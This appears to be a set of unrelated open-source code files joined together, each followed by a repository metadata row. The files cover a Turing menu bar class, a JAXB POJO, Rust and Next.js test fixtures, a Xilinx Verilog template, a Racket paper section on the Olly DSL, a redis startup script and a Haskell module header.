        var menuNode : ^MenuNode := firstMenuNode
        if not initialized or not showing then
            return
        end if
        % Top border, bar background, and bottom separator line.
        Draw.Line (0, maxy, maxx, maxy, black)
        Draw.FillBox (0, menuLine + 1, maxx, maxy - 1,
            WidgetGlobals.MENU_COLOUR)
        Draw.Line (0, menuLine, maxx, menuLine, black)
        % Walk the linked list of menus; each menu draws its own title.
        loop
            exit when menuNode = nil
            menuNode -> menu -> DrawMenuTitle
            menuNode := menuNode -> next
        end loop
    end DrawBar
    % Return the menu whose title area contains horizontal position x on the
    % menu bar, or nil if no menu spans that position.
    function FindMenu (x : int) : ^MenuClass
        var menuNode : ^MenuNode := firstMenuNode
        loop
            exit when menuNode = nil
            if menuNode -> menu -> InMenu (x) then
                result menuNode -> menu
            end if
            menuNode := menuNode -> next
        end loop
        result nil
    end FindMenu
procedure Initialize
if not initialized then
initialized := true
firstMenuNode := nil
menuLine := maxy - WidgetGlobals.MENU_BAR_HEIGHT
end if
end Initialize
%
% The package subprograms of MenuBarClass
%
procedure AddMenu (menu, afterMenu : ^MenuClass)
var newMenuNode, menuNode : ^MenuNode
var offset : int
Initialize
% Set the menu bar that the menu has been placed in
menu -> SetMenuBarLine (menuLine)
% Create a menu node and place it in the linked list
new newMenuNode
newMenuNode -> menu := menu
if afterMenu = nil then
newMenuNode -> next := firstMenuNode
firstMenuNode := newMenuNode
else
menuNode := firstMenuNode
loop
exit when menuNode = nil or menuNode -> menu = afterMenu
menuNode := menuNode -> next
end loop
if menuNode = nil then
AssertFailed ("Menu ID not found")
end if
newMenuNode -> next := menuNode -> next
menuNode -> next := newMenuNode
end if
% Set the start/end positions
menuNode := firstMenuNode
offset := 0
loop
exit when menuNode = nil
offset := menuNode -> menu -> SetWidth (offset)
menuNode := menuNode -> next
end loop
DrawBar
end AddMenu
procedure AppendMenu (menu : ^MenuClass)
Initialize
if firstMenuNode = nil then
AddMenu (menu, nil)
else
var menuNode : ^MenuNode := firstMenuNode
loop
exit when menuNode -> next = nil
menuNode := menuNode -> next
end loop
AddMenu (menu, menuNode -> menu)
end if
end AppendMenu
function ConsiderButtonDown (mouseX, mouseY : int) : boolean
var mx, my, b : int
var menu : ^MenuClass
if not initialized or not showing or mouseY < menuLine then
result false
end if
selectedMenu := FindMenu (mouseX)
if selectedMenu = nil then
result true
end if
% Hilite the menu
loop
if selectedMenu not= nil then
exit when selectedMenu -> ConsiderButtonDown (0, 0)
end if
Mouse.Where (mx, my, b)
selectedMenu := FindMenu (mx)
exit when b = 0
end loop
result true
end ConsiderButtonDown
function ConsiderKeystroke (key : char) : boolean
var menuNode : ^MenuNode := firstMenuNode
if not initialized or not showing then
result false
end if
% Check each menu for the keystroke
loop
exit when menuNode = nil
selectedMenu := menuNode -> menu
if menuNode -> menu -> ConsiderKeystroke (key) then
result true
end if
menuNode := menuNode -> next
end loop
result false
end ConsiderKeystroke
function GetLastMenu : ^MenuClass
if firstMenuNode = nil then
result nil
else
var menuNode : ^MenuNode := firstMenuNode
loop
exit when menuNode -> next = nil
menuNode := menuNode -> next
end loop
result menuNode -> menu
end if
end GetLastMenu
procedure Hide
showing := false
if initialized then
Draw.FillBox (0, menuLine, maxx, maxy,
WidgetGlobals.backgroundColour)
end if
end Hide
procedure Show
showing := true
DrawBar
end Show
end MenuBarClass
| Turing | 5 | ttracx/OpenTuring | turing/test/support/lib/GUIClass/MenuBarClass.tu | [
"MIT"
] |
package com.baeldung.xmlhtml.pojo.jaxb.html.elements;
import javax.xml.bind.annotation.XmlElement;
/**
 * JAXB POJO for a nested HTML fragment: holds a single child element that is
 * marshalled under the element name {@code p}.
 */
public class NestedElement {

    private CustomElement customElement;

    public CustomElement getCustomElement() {
        return customElement;
    }

    // The JAXB mapping is placed on the setter, so property access (not
    // field access) determines the marshalled element name.
    @XmlElement(name = "p")
    public void setCustomElement(CustomElement customElement) {
        this.customElement = customElement;
    }
}
"MIT"
] |
use inner::Trait;
// Private module: `Foo` and `Trait` are `pub` within it, and `Trait` is
// imported at the crate root by the `use` above without being re-exported.
mod inner {
    pub struct Foo;
    pub trait Trait {
        fn f(&self);
        fn f_ufcs(&self);
    }

    impl Trait for Foo {
        fn f(&self) { }
        fn f_ufcs(&self) { }
    }
}
// Public trait whose default methods call a method of the privately imported
// `inner::Trait` — once via method syntax and once via UFCS (`T::f(&t)`).
pub trait Outer {
    fn foo<T: Trait>(&self, t: T) { t.f(); }
    fn foo_ufcs<T: Trait>(&self, t: T) { T::f(&t); }
}

impl Outer for isize {}

// Free functions exercising the default methods through the `Outer` bound.
pub fn foo<T: Outer>(t: T) {
    t.foo(inner::Foo);
}
pub fn foo_ufcs<T: Outer>(t: T) {
    T::foo_ufcs(&t, inner::Foo)
}
| Rust | 4 | Eric-Arellano/rust | src/test/ui/issues/auxiliary/issue-11225-2.rs | [
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] |
export default function AboutBypass({ message }) {
return (
<div>
<h1 className="title">About Bypassed Page</h1>
<p className={message}>{message}</p>
</div>
)
}
// Forward the `message` query parameter (default: empty string) as a prop.
export function getServerSideProps(context) {
  const { query } = context
  return {
    props: { message: query.message || '' },
  }
}
| JavaScript | 4 | blomqma/next.js | test/integration/middleware/core/pages/rewrites/about-bypass.js | [
"MIT"
] |
// (c) Copyright 1995-2017 Xilinx, Inc. All rights reserved.
//
// This file contains confidential and proprietary information
// of Xilinx, Inc. and is protected under U.S. and
// international copyright and other intellectual property
// laws.
//
// DISCLAIMER
// This disclaimer is not a license and does not grant any
// rights to the materials distributed herewith. Except as
// otherwise provided in a valid license issued to you by
// Xilinx, and to the maximum extent permitted by applicable
// law: (1) THESE MATERIALS ARE MADE AVAILABLE "AS IS" AND
// WITH ALL FAULTS, AND XILINX HEREBY DISCLAIMS ALL WARRANTIES
// AND CONDITIONS, EXPRESS, IMPLIED, OR STATUTORY, INCLUDING
// BUT NOT LIMITED TO WARRANTIES OF MERCHANTABILITY, NON-
// INFRINGEMENT, OR FITNESS FOR ANY PARTICULAR PURPOSE; and
// (2) Xilinx shall not be liable (whether in contract or tort,
// including negligence, or under any other theory of
// liability) for any loss or damage of any kind or nature
// related to, arising under or in connection with these
// materials, including for any direct, or any indirect,
// special, incidental, or consequential loss or damage
// (including loss of data, profits, goodwill, or any type of
// loss or damage suffered as a result of any action brought
// by a third party) even if such damage or loss was
// reasonably foreseeable or Xilinx had been advised of the
// possibility of the same.
//
// CRITICAL APPLICATIONS
// Xilinx products are not designed or intended to be fail-
// safe, or for use in any application requiring fail-safe
// performance, such as life-support or safety devices or
// systems, Class III medical devices, nuclear facilities,
// applications related to the deployment of airbags, or any
// other applications that could lead to death, personal
// injury, or severe property or environmental damage
// (individually and collectively, "Critical
// Applications"). Customer assumes the sole risk and
// liability of any use of Xilinx products in Critical
// Applications, subject only to applicable laws and
// regulations governing limitations on product liability.
//
// THIS COPYRIGHT NOTICE AND DISCLAIMER MUST BE RETAINED AS
// PART OF THIS FILE AT ALL TIMES.
//
// DO NOT MODIFY THIS FILE.
// IP VLNV: xilinx.com:ip:ahblite_axi_bridge:3.0
// IP Revision: 10
// The following must be inserted into your Verilog file for this
// core to be instantiated. Change the instance name and port connections
// (in parentheses) to your own signal names.
//----------- Begin Cut here for INSTANTIATION Template ---// INST_TAG
ahblite_axi_bridge_0 your_instance_name (
.s_ahb_hclk(s_ahb_hclk), // input wire s_ahb_hclk
.s_ahb_hresetn(s_ahb_hresetn), // input wire s_ahb_hresetn
.s_ahb_hsel(s_ahb_hsel), // input wire s_ahb_hsel
.s_ahb_haddr(s_ahb_haddr), // input wire [31 : 0] s_ahb_haddr
.s_ahb_hprot(s_ahb_hprot), // input wire [3 : 0] s_ahb_hprot
.s_ahb_htrans(s_ahb_htrans), // input wire [1 : 0] s_ahb_htrans
.s_ahb_hsize(s_ahb_hsize), // input wire [2 : 0] s_ahb_hsize
.s_ahb_hwrite(s_ahb_hwrite), // input wire s_ahb_hwrite
.s_ahb_hburst(s_ahb_hburst), // input wire [2 : 0] s_ahb_hburst
.s_ahb_hwdata(s_ahb_hwdata), // input wire [31 : 0] s_ahb_hwdata
.s_ahb_hready_out(s_ahb_hready_out), // output wire s_ahb_hready_out
.s_ahb_hready_in(s_ahb_hready_in), // input wire s_ahb_hready_in
.s_ahb_hrdata(s_ahb_hrdata), // output wire [31 : 0] s_ahb_hrdata
.s_ahb_hresp(s_ahb_hresp), // output wire s_ahb_hresp
.m_axi_awid(m_axi_awid), // output wire [3 : 0] m_axi_awid
.m_axi_awlen(m_axi_awlen), // output wire [7 : 0] m_axi_awlen
.m_axi_awsize(m_axi_awsize), // output wire [2 : 0] m_axi_awsize
.m_axi_awburst(m_axi_awburst), // output wire [1 : 0] m_axi_awburst
.m_axi_awcache(m_axi_awcache), // output wire [3 : 0] m_axi_awcache
.m_axi_awaddr(m_axi_awaddr), // output wire [31 : 0] m_axi_awaddr
.m_axi_awprot(m_axi_awprot), // output wire [2 : 0] m_axi_awprot
.m_axi_awvalid(m_axi_awvalid), // output wire m_axi_awvalid
.m_axi_awready(m_axi_awready), // input wire m_axi_awready
.m_axi_awlock(m_axi_awlock), // output wire m_axi_awlock
.m_axi_wdata(m_axi_wdata), // output wire [31 : 0] m_axi_wdata
.m_axi_wstrb(m_axi_wstrb), // output wire [3 : 0] m_axi_wstrb
.m_axi_wlast(m_axi_wlast), // output wire m_axi_wlast
.m_axi_wvalid(m_axi_wvalid), // output wire m_axi_wvalid
.m_axi_wready(m_axi_wready), // input wire m_axi_wready
.m_axi_bid(m_axi_bid), // input wire [3 : 0] m_axi_bid
.m_axi_bresp(m_axi_bresp), // input wire [1 : 0] m_axi_bresp
.m_axi_bvalid(m_axi_bvalid), // input wire m_axi_bvalid
.m_axi_bready(m_axi_bready), // output wire m_axi_bready
.m_axi_arid(m_axi_arid), // output wire [3 : 0] m_axi_arid
.m_axi_arlen(m_axi_arlen), // output wire [7 : 0] m_axi_arlen
.m_axi_arsize(m_axi_arsize), // output wire [2 : 0] m_axi_arsize
.m_axi_arburst(m_axi_arburst), // output wire [1 : 0] m_axi_arburst
.m_axi_arprot(m_axi_arprot), // output wire [2 : 0] m_axi_arprot
.m_axi_arcache(m_axi_arcache), // output wire [3 : 0] m_axi_arcache
.m_axi_arvalid(m_axi_arvalid), // output wire m_axi_arvalid
.m_axi_araddr(m_axi_araddr), // output wire [31 : 0] m_axi_araddr
.m_axi_arlock(m_axi_arlock), // output wire m_axi_arlock
.m_axi_arready(m_axi_arready), // input wire m_axi_arready
.m_axi_rid(m_axi_rid), // input wire [3 : 0] m_axi_rid
.m_axi_rdata(m_axi_rdata), // input wire [31 : 0] m_axi_rdata
.m_axi_rresp(m_axi_rresp), // input wire [1 : 0] m_axi_rresp
.m_axi_rvalid(m_axi_rvalid), // input wire m_axi_rvalid
.m_axi_rlast(m_axi_rlast), // input wire m_axi_rlast
.m_axi_rready(m_axi_rready) // output wire m_axi_rready
);
// INST_TAG_END ------ End INSTANTIATION Template ---------
// You must compile the wrapper file ahblite_axi_bridge_0.v when simulating
// the core, ahblite_axi_bridge_0. When compiling the wrapper file, be sure to
// reference the Verilog simulation library.
| Verilog | 3 | mrDrivingDuck/mips32-CPU | soc/rtl/xilinx_ip/ahblite_axi_bridge_0/ahblite_axi_bridge_0.veo | [
"MIT"
] |
DefaultBehavior FlowControl tap = dmacro("takes one or two arguments that represent code. Will yield the receiver and then return the receiver after executing the given code",
[code]
code evaluateOn(call ground, self)
self,
[argName, code]
LexicalBlock createFrom(list(argName, code), call ground) call(self)
self
)
DefaultBehavior FlowControl rap = macro("takes one or more message chains. Will call these on the receiver, then return the receiver",
call arguments each(code,
code evaluateOn(call ground, self))
self
)
DefaultBehavior FlowControl tapping = DefaultBehavior FlowControl cell(:rap)
DefaultBehavior FlowControl sap = dmacro(
[sapCode, iterCode]
result = sapCode evaluateOn(call ground, self)
while(result,
iterCode evaluateOn(call ground, result)
result = sapCode evaluateOn(call ground, self))
self,
[sapCode, argName, iterCode]
destructor = Mixins Enumerable Destructor from(argName)
block = LexicalBlock createFrom(destructor argNames + list(iterCode), call ground)
result = sapCode evaluateOn(call ground, self)
while(result,
block call(*(destructor unpack(result)))
result = sapCode evaluateOn(call ground, self))
self
)
cell(:use) reload = method("will take the same kind of arguments as use, but will make sure that the code will be reloaded every time called.",
filename,
System lowLevelLoad!(filename, true)
)
DefaultBehavior FlowControl dip = dmacro("takes one argument name and one piece of code that will get the receiver as argument and return the result of calling the code",
[argName, code]
LexicalBlock createFrom(list(argName, code), call ground) call(self)
)
| Ioke | 4 | olabini/ioke | src/builtin/O05_misc.ik | [
"ICU",
"MIT"
] |
#Signature file v4.1
#Version 1.36
| Standard ML | 0 | timfel/netbeans | platform/libs.osgi/nbproject/org-netbeans-libs-osgi.sig | [
"Apache-2.0"
] |
# this file and {QtAssistant, QAssistantClient} were copied from the
# Qt 4.6.3 source code, directory "include/QtAssistant". This file
# was modified so that the Q* headers are located in the same
# directory as this file.
SYNCQT.HEADER_FILES = ../../qassistantclient.h ../../qassistantclient_global.h QtAssistant
SYNCQT.HEADER_CLASSES = QAssistantClient
SYNCQT.PRIVATE_HEADER_FILES =
| QMake | 2 | davidlrichmond/macports-ports | devel/qt-assistant/files/headers.pri | [
"BSD-3-Clause"
] |
/*
examples for shared and unshared, global and static data in UPC
Liao, 7/7/2008
*/
/* ---------- unshared data (TLD)--------------------------*/
/*Unshared global variables , with extern */
extern int quux;
/*unshared global variables: scalar, array, w or w/o initializer */
int counter;
int counter2 = 100;
double myarray[10];
double myarray2[5]={0.0, 1.1, 2.2,3.3,4.4};
/*special case: private to shared */
shared[4] int * p2s_p1;
shared[4] int * p2s_p2 = 0;
/*-----------shared data (SSD)-------------------------------
shared scalar, array, initializer
*/
shared int global_counter;
#ifdef ROSE_USE_NEW_EDG_INTERFACE
// DQ (2/17/2011): Remove the initializaion since EDG reports it as an error with EDG 4.0.
shared int global_counter2;
#else
shared int global_counter2 = 2;
#endif
/* shared arrays */
shared[5] double array[100*THREADS];
/* Berkeley UPC compiler does not yet fully implement this. See their bug 36
*/
#ifdef ROSE_USE_NEW_EDG_INTERFACE
// DQ (2/17/2011): Remove the initializaion since EDG reports it as an error with EDG 4.0.
shared[5] double array2[10*THREADS];
#else
shared[5] double array2[10*THREADS]={1.1, 2.2};
#endif
/* shared pointers */
shared int* shared[10] s2s_p4; /*shared to shared */
shared[10] int* shared s2s_p44; /*shared to shared */
shared[5] int* shared[8] s2s_p444; /*shared to shared */
int *shared s2p_p3; /*shared to private */
int *shared[5] s2p_p33; /*shared to private */
/* Demonstrates unshared and shared static data declared at function scope.
   NOTE(review): the local `counter` shadows the file-scope `counter`. */
int foo()
{
  /* -------unshared static data -----------*/
  static int counter; /* static scalar */
  static int counter2 =0; /* static scalar with initializer */
  static double fooArray [2]; /* static array */
  static double fooArray2 [2] = {3.1, 1.3}; /* static array */

  /* -------shared static data -----------*/
  static shared int scounter; /* static shared scalar */
#ifdef ROSE_USE_NEW_EDG_INTERFACE
// DQ (2/17/2011): Remove the initializaion since EDG reports it as an error with EDG 4.0.
  static shared int scounter2; /* static shared scalar with initializer */
#else
  static shared int scounter2 =0; /* static shared scalar with initializer */
#endif

  /*static shared array */
  static shared int sfooArray3[5*THREADS];

#ifdef ROSE_USE_NEW_EDG_INTERFACE
// DQ (2/17/2011): Remove the initializaion since EDG reports it as an error with EDG 4.0.
  static shared int sfooArray5[5*THREADS];
#else
  static shared int sfooArray5[5*THREADS] = {1,2,3,4,5};
#endif

  static shared int* p2s_static;

  /* foo() is declared to return int: return a value instead of falling off
     the end (undefined behavior if a caller ever uses the result). */
  return 0;
}
int main()
{
  /* Automatic (stack) pointer flavors for comparison with the file-scope
     declarations above. */
  int * p1; /* a private pointer to a private variable */
  /* NOTE(review): this local shadows the file-scope `p2s_p2`. */
  shared int *p2s_p2; /* a private pointer to a shared variable, most useful */
  shared[5] int *p2s_p22; /* a private pointer to a shared variable, most useful */
  return 0;
}
| Unified Parallel C | 4 | maurizioabba/rose | tests/CompileTests/UPC_tests/shared.upc | [
"BSD-3-Clause"
] |
/**
Copyright 2015 Acacia Team
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
package org.acacia.localstore;
import x10.util.HashMap;
import x10.util.HashSet;
public interface AcaciaLocalStore {
public def loadGraph():Boolean;
public def storeGraph():Boolean;
public def getUnderlyingHashMap():HashMap[Long, HashSet[Long]];
public def getOutDegreeDistributionHashMap():HashMap[Long, Long];
public def initialize():void;
public def addVertex(attributes:Rail[Any]):void;
public def addEdge(startVid:Long, endVid:Long):void;
public def getVertexCount():Long;
public def getEdgeCount():Long;
} | X10 | 3 | mdherath/Acacia | src/org/acacia/localstore/AcaciaLocalStore.x10 | [
"Apache-2.0"
] |
CREATE DATABASE `fail_fast`;
| SQL | 0 | WizardXiao/tidb | br/tests/lightning_fail_fast/data/fail_fast-schema-create.sql | [
"Apache-2.0"
] |
package com.baeldung.event.listener;
import org.springframework.context.annotation.ComponentScan;
import org.springframework.context.annotation.Configuration;
@Configuration
@ComponentScan(basePackages = "com.baeldung.event.listener")
public class EventConfig {
}
| Java | 4 | DBatOWL/tutorials | spring-core/src/main/java/com/baeldung/event/listener/EventConfig.java | [
"MIT"
] |
header.home=Accueil!
helloMsg=Bonjour, bienvenue dans Ninja Framework! | INI | 1 | DBatOWL/tutorials | ninja/src/main/java/conf/messages_fr.properties | [
"MIT"
] |
"""Scaffold new integration."""
| Python | 0 | domwillcode/home-assistant | script/scaffold/__init__.py | [
"Apache-2.0"
] |
#N canvas 556 43 508 402 12;
#X obj 138 73 inlet~;
#X obj 229 74 inlet~;
#X obj 138 202 outlet~;
#X obj 212 202 outlet~;
#X obj 138 121 +~;
#X obj 211 119 -~;
#X obj 211 143 delwrite~ \$1 \$2;
#X obj 212 172 delread~ \$1 \$2;
#X text 45 20 This appears as an abstraction in patch G08.reverb.pd
;
#X text 34 256 This network makes two copies of the (stereo) input
\, one in phase \, the other out of phase and delayed. The total frequency
response is flat. The total signal power out is exactly twice that
of the input \, no matter what frequencies the input contains. This
is used to increase echo density \, by stacking several of these units
with different delay times. Each stage doubles the echo density.;
#X connect 0 0 4 0;
#X connect 0 0 5 0;
#X connect 1 0 4 1;
#X connect 1 0 5 1;
#X connect 4 0 2 0;
#X connect 5 0 6 0;
#X connect 7 0 3 0;
| Pure Data | 4 | mcclure/pure-data | doc/3.audio.examples/reverb-echo.pd | [
"TCL"
] |
a {
background: url('
}
| Less | 0 | rakacreative/prettier | tests/misc/errors/less/open-sigle-quote.less | [
"MIT"
] |
#lang scribble/base
@(require
"defs.rkt"
"bib.rkt"
scribble/manual
scriblib/footnote
scriblib/figure
scribble-latex-utils/utils)
@title*{Olly - Ott-Like LibrarY}
All the previous extensions are features of existing proof assistants.
In this section we present Olly, a domain-specific language (DSL) for modeling
programming languages, which provides features that no other proof assistant
supports.
Olly provides BNF notation for generating inductive types that represent
programming language syntax.
The BNF notation automatically converts variables in the syntax to de Bruijn
indices.
Olly also supports inference rule notation for modeling relations.
Both notations support extracting the models to LaTeX and Coq, in addition to
using the models directly in Cur.
Olly is inspired by Ott@~citea{sewell:2007}, a tool for generating models of
programming language semantics in different proof assistants from a single
model written in a DSL.
Ott is an external tool that generates files for each proof assistant, while
Olly is integrated into the object language of Cur as a language extension.
@subsubsub*section*{BNF Notation}
We begin with an example of defining of the syntax of the simply-typed
λ-calculus using the @racket[define-language] form.
This language includes booleans, the unit type, pairs, and functions.
Note that the @racket[let] form is the elimination form for pairs in this
language, and binds two names.
@racketblock[
define-language stlc
#:vars (x)
#:output-coq "stlc.v"
#:output-latex "stlc.tex"
val (v) ::= true false unit
type (A B) ::= boolty unitty (-> A B) (* A A)
term (e) ::= x v (lambda (#:bind x : A) e)
(app e e) (cons e e)
(let (#:bind x #:bind x) = e in e)
]
The first argument to the form is a name for the language---@racket[stlc] in
this case.
The next three lines are optional keyword arguments.
The @racket[#:vars] argument is a set of meta-variables that represent variables
in the syntax.
The @racket[#:output-coq] argument is a string representing a file name;
when given, a Coq representation of the language syntax is written to the
specified file during compilation.
Similarly, the @racket[#:output-latex] argument is a string representing a file
name; when given, a Latex rendering of the BNF grammar is written to the
specified file during compilation.
After the optional arguments, @racket[define-language] expects an arbitrary
number of non-terminal definitions from which it generates inductive types.
To better understand @racket[define-language] non-terminal clauses, let us
first look at the code generated for the @racket[term] non-terminal.
@racketblock[
data stlc-term : 0 Type
Nat->stlc-term : {Nat -> stlc-term}
stlc-val->stlc-term : {stlc-value ->
stlc-term}
stlc-lambda : {stlc-type -> stlc-term ->
stlc-term}
stlc-app : {stlc-term -> stlc-term -> stlc-term}
stlc-cons : {stlc-term -> stlc-term ->
stlc-term}
stlc-let : {stlc-term -> stlc-term ->
stlc-term}
]
References to other non-terminals, such as the reference to @racket[x], result
in @emph{conversion constructors} which simply inject one non-terminal into the
other.
The names of the conversion constructors are generated from the types of the
non-terminals with the sigil @racket[->] between them, indicating
conversion.
For example, @racket[Nat->stlc-term] is a @racket[stlc-term]
constructor that converts a @racket[Nat] (representing a de Bruijn index) to a
@racket[stlc-term].
Other constructor names are generated from the name of the language,
@racket[stlc], and the name of the constructor given in the syntax.
For example, the constructor name generated from the @racket[lambda] syntax is
@racket[stlc-lambda].
More formally, the syntax of a non-terminal definition is @racket[(nt-name
(meta-variables ...) ::= syn-clause ...)].
As Cur does not currently support mutual inductive definitions, all
non-terminal definitions must be appear in order of their dependencies.
Each @racket[syn-clause] must be either a reference to a previously defined
non-terminal, a terminal represented by a unique identifier, or an s-expression
whose first element is a unique identifier.
For each non-terminal, we generate a new inductive type.
We generate a constructors for the inductive type for each @racket[syn-clause].
We prefix the name of each inductive type and each constructor by the language name.
For references to previously defined non-terminals, we generate a constructor
that act as a tag and injects the previous non-terminal into the new one.
For terminals, we generate a constructor that take no arguments and whose name
is based on the terminal.
For s-expressions, we create a new constructor whose name is based on
the identifier at the head of the s-expression and whose arguments' types are
computed from the meta-variables that appear in the rest of the s-expression.
We only use the non-meta-variable symbols such as @racket[:]
in the Latex rendering of the BNF grammar.
The syntax @racket[#:bind x] declares @racket[x] to be a binding position, so
it is not treated as an argument.
Since we use de Bruijn indices for binding, binding positions are erased.
The @racket[define-language] form allows us to create the model using BNF
notation, but working with the model requires using the generated constructor
names.
Instead of using the constructors directly, we can write an extension that
parses the @racket[stlc] syntax into the appropriate constructors@note{It
should be possible to generate this parser in the @racket[define-language]
extension, but we have not yet implemented that feature.}.
@Figure-ref{fig:stlc-parse} presents an excerpt of the parser.
The form @racket[begin-stlc] simply calls the metalanguage function
@racket[parse-stlc] with the syntax object @racket[e] and a new hashtable.
The @racket[parse-stlc] function declares each of the constructor names and
syntactic symbols as literals, and loops over the syntax object generating the
constructors that correspond to the @racket[stlc] syntax.
It uses the hashtable to map variable names to de Bruijn indices.
When parsing a @racket[lambda], it shifts each index in the hashtable.
For convenience, the parser accepts the syntax @racket[(e1 e2)] for
application instead of @racket[(app e1 e2)] and @racket[1] for the unit type
instead of @racket[unitty].
@figure["fig:stlc-parse" "Parser for STLC Syntax (excerpt)"
@#reader scribble/comment-reader #:escape-id UNSYNTAX
(RACKETBLOCK0
define-syntax (begin-stlc syn)
syntax-case syn ()
[(_ e) (parse-stlc #'e (make-immutable-hash))]
begin-for-syntax
define (parse-stlc syn d)
syntax-case syn (lambda : prj * ->
let in cons bool
unit true false)
[(lambda (x : t) e)
#`(stlc-lambda
#,(parse-stlc #'t d)
#,(parse-stlc #'e
(dict-set
(dict-shift d)
(syntax->datum #'x)
#`z)))]
[(e1 e2)
#`(stlc-app
#,(parse-stlc #'e1 d)
#,(parse-stlc #'e2 d))]
[(cons e1 e2)
#`(stlc-cons
#,(parse-stlc #'e1 d)
#,(parse-stlc #'e2 d))]
....
[false #'(stlc-val->stlc-term stlc-false)]
[bool #'stlc-boolty]
define (dict-shift d)
for/fold ([d (make-immutable-hash)])
([(k v) (in-dict d)])
dict-set d k #`(s #,v)
)
]
@subsubsub*section*{Inference-rule Notation}
@Figure-ref{fig:has-type} presents an example of using the inference rule
notation.
We use the @racket[define-relation] form to model a type system for
@racket[stlc].
The @racket[define-relation] form takes as its first argument a name for the
new relation applied to the types of its arguments.
This example defines the inductive type @racket[has-type] which relates a list
of @racket[stlc-type]s, an @racket[stlc-term], and an @racket[stlc-type].
Like the @racket[define-language] form, @racket[define-relation] takes optional
arguments for generating Coq and Latex output.
The rest of the form is interpreted as a sequence of inference rules.
Each inference rule is a list of assumptions, followed by a horizontal line
represented by an arbitrary number of hyphens, a name for the rule that will
become the name of the constructor, and a conclusion that must be the relation
applied to its arguments.
@figure["fig:has-type" "STLC Type System Model (excerpt)"
@exact{\vspace{4ex}}
@#reader scribble/comment-reader
(racketblock0
define-relation
(has-type (List stlc-type) stlc-term stlc-type)
#:output-coq "stlc.v"
#:output-latex "stlc.tex"
[(g : (List stlc-type))
------------------------ T-Unit
(has-type g (begin-stlc unit) (begin-stlc 1))]
....
;; Generates:
data has-type : 0 (-> (List stlc-type)
stlc-term
stlc-type
Type)
T-Unit : (forall (g : (List stlc-type))
(has-type
g
(stlc-val->stlc-term stlc-unit)
stlc-unitty))
....
)]
@Figure-ref{fig:define-relation-impl} presents an excerpt of the implementation
for @racket[define-relation].
To implement this form, we use @racket[syntax-parse]@~citea{ryan2012}, but
only present enough of @racket[syntax-parse] to undeerstand the key ideas in
our implementation.
The @racket[syntax-parse] form allows parsing syntax objects rather than merely
pattern matching on them.
The form allows specifying patterns as in @racket[syntax-case], but also
support refining the patterns using syntax classes that specify subpatterns and
side-conditions.
We can apply a syntax class to a pattern variable by using the syntax
@racket[pv:class], or by using the syntax @racket[(~var pv class)].
Both declare the pattern variable @racket[pv] must match the syntax class
@racket[class], but the @racket[~var] syntax is required when the syntax class
takes arguments.
In the definition of @racket[define-relation], we declare that the name of the
relation must be an identifier using the colon syntax and the syntax class
@racket[id].
We declare that the next two arguments are optional using the special form
@racket[~optional], which takes a pattern as its argument.
We specify the pattern is a sequence of the keyword @racket[#:output-coq]
followed by a pattern variable @racket[coq-file].
We use the syntax class @racket[str] to refine the @racket[coq-file] pattern,
indicating that it must be a string literal.
If this optional pattern matches, then the @racket[coq-file] pattern variable
is bound in an attribute map.
The form @racket[attribute] references the attribute map and returns
@racket[false] if the attribute is not bound.
After the optional arguments, we declare a pattern variable @racket[rule] using
the @racket[~var] syntax, refine it using the @racket[inference-rule] syntax
class, and use @racket[...] to match a list of inference rules.
Next we define the syntax class @racket[inference-rule].
The @racket[inference-rule] syntax class takes two arguments: the name of the
relation and the list of indices.
This syntax class matches when the syntax has the pattern of a list of
hypothesis, followed by a horizontal line, a name, and a conclusion.
The rule name must be an identifier.
The syntax class for a horizontal line converts the syntax to a string and uses
a regular expression to match when the string is an arbitrary number of
hyphens.
The syntax class for a conclusion uses the name of the relation and the indices
to ensure the conclusion is the original relation applied to the right number
of arguments.
@figure["fig:define-relation-impl" @elem{Implementation of @racket[define-relation] (excerpt)}
@#reader scribble/comment-reader
(racketblock0
define-syntax (define-relation syn)
syntax-parse syn
[(_ (name:id index ...)
(~optional
(~seq #:output-coq coq-file:str))
(~optional
(~seq #:output-latex latex-file:str))
(~var rule (inference-rule
(attribute name)
(attribute index)))
...)
....]
begin-for-syntax
define-syntax-class horizontal-line
pattern
x:id
#:when (regexp-match?
#rx"-+" (syntax->string #'x))
define-syntax-class (conclusion n args r)
pattern
(name:id arg ...)
#:fail-unless
(equal? (syntax->symbol #'name)
(syntax->symbol #'n))
(format "Rule ~a: conclusion mismatch" r)
....
define-syntax-class (inference-rule name
indices)
pattern (h ...
line:horizontal-line
rule-name:id
(~var t (conclusion
name
indices
(attribute rule-name))))
....
)] | Racket | 5 | bluephoenix47/cic-redex | cur-paper/olly.scrbl | [
"BSD-2-Clause"
] |
public func overloaded() {}
| Swift | 1 | lwhsu/swift | test/attr/Inputs/warn_unqualified_access_other.swift | [
"Apache-2.0"
] |
// MIR for `add` before PreCodegen
fn add() -> u32 {
let mut _0: u32; // return place in scope 0 at $DIR/return_place.rs:5:13: 5:16
bb0: {
_0 = const 4_u32; // scope 0 at $DIR/return_place.rs:6:5: 6:10
return; // scope 0 at $DIR/return_place.rs:7:2: 7:2
}
}
| Mirah | 4 | Eric-Arellano/rust | src/test/mir-opt/const_prop/return_place.add.PreCodegen.before.mir | [
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] |
#!/bin/bash
# Redis is one of those servers which by default accept connections from
# everywhere. Luckily, homebrew and presumably debian come with sane defaults.
# However, they're located in different directories.
if [[ $(uname) = 'Darwin' ]]; then
echo "Running redis from Homebrew..."
redis-server /usr/local/etc/redis.conf
fi
if [[ $(uname) = 'Linux' ]]; then
# redis-server package may have redis running by default; don't crash if so
pgrep -lf redis-server
if [ $? -ne 0 ]; then
echo "Running redis"
redis-server /etc/redis/redis.conf
else
echo "Redis already running"
sleep infinity
fi
fi
| Shell | 4 | cnheider/nylas-mail | packages/cloud-core/scripts/run-redis.sh | [
"MIT"
] |
{-# LANGUAGE FlexibleContexts #-}
{-# LANGUAGE GADTs #-}
{-# LANGUAGE KindSignatures #-}
{-# LANGUAGE TypeApplications #-}
module Analysis.Effect.Store
( -- * Store effect
alloc
, (.=)
, fetch
, Store(..)
-- * Re-exports
, Algebra
, Has
, run
) where
import Analysis.Name
import Control.Effect.Labelled
import Data.Kind as K
-- Store effect
